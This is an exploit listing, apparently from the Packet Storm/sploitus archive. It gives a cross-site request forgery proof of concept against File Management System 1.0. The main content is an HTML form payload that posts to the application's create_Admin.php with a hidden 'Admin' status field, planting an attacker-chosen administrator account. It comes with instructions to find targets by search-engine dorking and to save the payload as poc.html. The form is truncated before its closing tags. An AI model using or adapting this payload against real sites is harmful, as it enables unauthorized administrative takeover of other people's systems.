Share
## https://sploitus.com/exploit?id=PACKETSTORM:181232
=============================================================================================================================================  
| # Title : File Management System 1.0 CSRF Add Admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Line 1 : Set your target.  
  
[+] Save As poc.html  
  
[+] Payload :  
  
<form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  
<div class="modal-dialog" role="document">  
<div class="modal-content">  
<div class="modal-header text-center">  
<h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>  
<button type="button" class="close" data-dismiss="modal" aria-label="Close">  
<span aria-hidden="true">&times;</span>  
</button>  
</div>  
<div class="modal-body mx-3">  
<div class="md-form mb-5">  
<input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">  
</div>  
<div class="md-form mb-5">  
<i class="fas fa-user prefix grey-text"></i>  
<input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">  
<label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>  
</div>  
<div class="md-form mb-5">  
<i class="fas fa-envelope prefix grey-text"></i>  
<input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">  
<label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>  
</div>  
  
<div class="md-form mb-4">  
<i class="fas fa-lock prefix grey-text"></i>  
<input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">  
<label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>  
</div>  
  
</div>  
<div class="modal-footer d-flex justify-content-center">  
<button class="btn btn-info" name="reg">Sign up</button>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================